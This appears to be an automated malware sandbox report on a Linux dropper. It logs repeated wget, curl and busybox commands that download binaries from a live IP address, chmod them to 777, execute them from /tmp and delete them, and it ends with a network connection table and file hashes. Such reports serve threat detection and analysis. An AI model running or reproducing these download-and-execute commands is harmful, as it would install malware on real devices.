[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 151.101.193.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 89.187.167.7:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97